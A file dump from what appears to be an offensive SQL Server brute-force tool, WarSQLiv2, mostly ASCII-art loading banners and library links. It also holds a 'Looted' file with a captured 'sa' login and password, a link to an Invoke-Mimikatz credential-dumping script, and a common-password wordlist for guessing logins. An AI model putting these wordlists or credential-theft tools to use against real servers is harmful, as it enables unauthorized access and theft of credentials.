6 | ####### ####### ###### ### ## ## ### ###
7 | ### ### ### ## ## ## ### ## #### ### ###
8 | ## ## ### ## ## ## ##### ##### ####### ###
9 | ##
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/14.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/14.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/14.txt:
--------------------------------------------------------------------------------
1 |
2 | __ __ ___ ___ _ _
3 | \ \ / /__ _ _ _ / __| / _ \ | | (_)
4 | \ \/\/ // _` | | '_| \__ \ | (_) | | |__ | |
5 | \_/\_/ \__,_| _|_|_ |___/ \__\_\ |____| _|_|_
6 | _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|
7 | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/15.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/15.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/15.txt:
--------------------------------------------------------------------------------
1 |
2 | >=> >=> >=>
3 | >=> >=> >=>
4 | >=> >=> >=> >=> >==> >=> >=> >==> >> >==>
5 | >=====>>=> >=> >=> >=> >=> >=> >> >=> >=>
6 | >=> >=> >=> >=> >=> >=>=> >>===>>=> >=>
7 | >=> >=> >=> >=> >=> >=> >=> >> >=>
8 | >=> >=> >==>>>==> >==> >=> >=> >====> >==>
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/2.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/2.txt:
--------------------------------------------------------------------------------
1 | _ _ _ _____ _____ __ _ ___ ___
2 | | | | |___ ___| __| | | |_| _ _|_ | | |
3 | | | | | .'| _|__ | | | |__| | | | | _|_| | |
4 | |_____|__,|_| |_____|__ _|_____|_| \_/|___|_|___|
5 | |__|
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/3.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/3.txt:
--------------------------------------------------------------------------------
1 | O~~ O~~ O~~ ~~ O~~~~ O~~
2 | O~~ O~~ O~~ O~~ O~~ O~~ O~~ O~
3 | O~~ O~ O~~ O~~ O~ O~~~ O~~ O~~ O~~O~~
4 | O~~ O~~ O~~ O~~ O~~ O~~ O~~ O~~ O~~O~~ O~~
5 | O~~ O~ O~~ O~~O~~ O~~ O~~ O~~ O~~ O~~O~~ O~~
6 | O~ O~ O~~~~O~~ O~~ O~~ O~~ O~~ O~~ O~ O~~ O~~ O~~
7 | O~~ O~~ O~~ O~~~O~~~ O~~ ~~ O~~ ~~ O~~~~~~~~O~~
8 | O~
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/4.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/4.txt:
--------------------------------------------------------------------------------
1 |
2 | __ __
3 | ( / _ _ ( / ) / '
4 | |/|/ (/ / __) (__\ (__ /
5 |
6 |
7 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/5.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/5.txt:
--------------------------------------------------------------------------------
1 | _ _ __ ___ ___ __ __ __
2 | ( \/\/ )( ) ( ,) / __) / \ ( ) ( )
3 | \ / /__\ ) \ \__ \( () ) )(__ )(
4 | \/\/ (_)(_)(_)\_)(___/ \___\(____)(__)
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/6.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/6.txt:
--------------------------------------------------------------------------------
1 |
2 | dP dP dP .d88888b .88888. dP oo
3 | 88 88 88 88. "' d8' `8b 88
4 | 88 .8P .8P .d8888b. 88d888b. `Y88888b. 88 88 88 dP
5 | 88 d8' d8' 88' `88 88' `88 `8b 88 db 88 88 88
6 | 88.d8P8.d8P 88. .88 88 d8' .8P Y8. Y88P 88 88
7 | 8888' Y88' `88888P8 dP Y88888P `8888PY8b 88888888P dP
8 | ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/7.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/7.txt:
--------------------------------------------------------------------------------
1 | _ _ _ _ _ _
2 | / \ / \ / \ / \ / \ / \
3 | ( H | a | c | k | e | r )
4 | \_/ \_/ \_/ \_/ \_/ \_/
5 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/8.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/8.txt:
--------------------------------------------------------------------------------
1 | _ _ _____ _____ _ _ _____ _____
2 | | | | | / ___|| _ | | (_) / __ \| _ |
3 | | | | | __ _ _ __\ `--. | | | | | _ __ __`' / /'| |/' |
4 | | |/\| |/ _` | '__|`--. \| | | | | | | \ \ / / / / | /| |
5 | \ /\ / (_| | | /\__/ /\ \/' / |___| | \ V / ./ /___\ |_/ /
6 | \/ \/ \__,_|_| \____/ \_/\_\_____/_| \_/ \_____(_)___/
7 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Loading/9.png
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Loading/9.txt:
--------------------------------------------------------------------------------
1 | _ ____ ____ ____ ____ _ _
2 | / \ /|/ _ \/ __\/ ___\/ _ \/ \ / \
3 | | | ||| / \|| \/|| \| / \|| | | |
4 | | |/\||| |-||| /\___ || \_\|| |_/\| |
5 | \_/ \|\_/ \|\_/\_\\____/\____\\____/\_/
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Looted/Looted.txt:
--------------------------------------------------------------------------------
1 | 192.168.17.167:1433:sa:Password1
2 |
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Mimikatz/Invoke-Mimikatz.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/bin/Debug/Scanner/Mimikatz/Invoke-Mimikatz.txt
--------------------------------------------------------------------------------
/WarSQLiv2/bin/Debug/Scanner/Wordlists/Fast.txt:
--------------------------------------------------------------------------------
1 | 1aaaaaaa
2 | Sa123456
3 | SFSMANSFS
4 | 1aaaaaaa
5 | Sa123456
6 | X5!h6KF6jD5PU
7 | SFSMANSFS
8 | .
9 | 123456aaaaaaaaa
10 | 1234567
11 | jKKrAth3c
12 | 12345678
13 | 123456789
14 | 1234567890
15 | Sfsmansfs^1
16 | 0987654321
17 | 987654321
18 | 123123
19 | 11111
20 | 111111
21 | 22222
22 | 222222
23 | 333333
24 | 33333
25 | 44444
26 | 444444
27 | 55555
28 | 555555
29 | 66666
30 | 666666
31 | 77777
32 | 777777
33 | 88888
34 | 888888
35 | 99999
36 | 999999
37 | 00000
38 | 000000
39 | admin
40 | password
41 | sifre
42 | 1q2w3e
43 | 1q2w3e4r
44 | 1q2w3e4r5t
45 | q1w2e3r4t5
46 | qwert
47 | q1w2e3
48 | q1w2e3r4
49 | qwerty
50 | qwer1234
51 | demo
52 | admin123
53 | admin1234
54 | 123abc123
55 | 123456
56 | 12345
57 | 123456789
58 | password
59 | iloveyou
60 | princess
61 | 1234567
62 | 12345678
63 | 1234
64 | root
65 | toor
66 | abc123
67 | nicole
68 | daniel
69 | 457595
70 | babygirl
71 | monkey
72 | lovely
73 | jessica
74 | 654321
75 | michael
76 | ashley
77 | qwerty
78 | 111111
79 | iloveu
80 | 000000
81 | Password1
82 |
83 | 123123
84 | 123123123
--------------------------------------------------------------------------------
/WarSQLiv2/icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/icon.ico
--------------------------------------------------------------------------------
/WarSQLiv2/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/WarSQLiv2/logo.png
--------------------------------------------------------------------------------
/WarSQLiv2/packages.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
--------------------------------------------------------------------------------
/packages/MaterialDesignColors.1.1.1/MaterialDesignColors.1.1.1.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/packages/MaterialDesignColors.1.1.1/MaterialDesignColors.1.1.1.nupkg
--------------------------------------------------------------------------------
/packages/MaterialDesignColors.1.1.1/lib/net45/MaterialDesignColors.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/packages/MaterialDesignColors.1.1.1/lib/net45/MaterialDesignColors.dll
--------------------------------------------------------------------------------
/packages/MaterialDesignThemes.1.2.0.339/MaterialDesignThemes.1.2.0.339.nupkg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/packages/MaterialDesignThemes.1.2.0.339/MaterialDesignThemes.1.2.0.339.nupkg
--------------------------------------------------------------------------------
/packages/MaterialDesignThemes.1.2.0.339/lib/net45/MaterialDesignThemes.Wpf.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mindspoof/WarSQLi/253ac638fc57aa1d4ee2f2c82ebc250a02e26368/packages/MaterialDesignThemes.1.2.0.339/lib/net45/MaterialDesignThemes.Wpf.dll
--------------------------------------------------------------------------------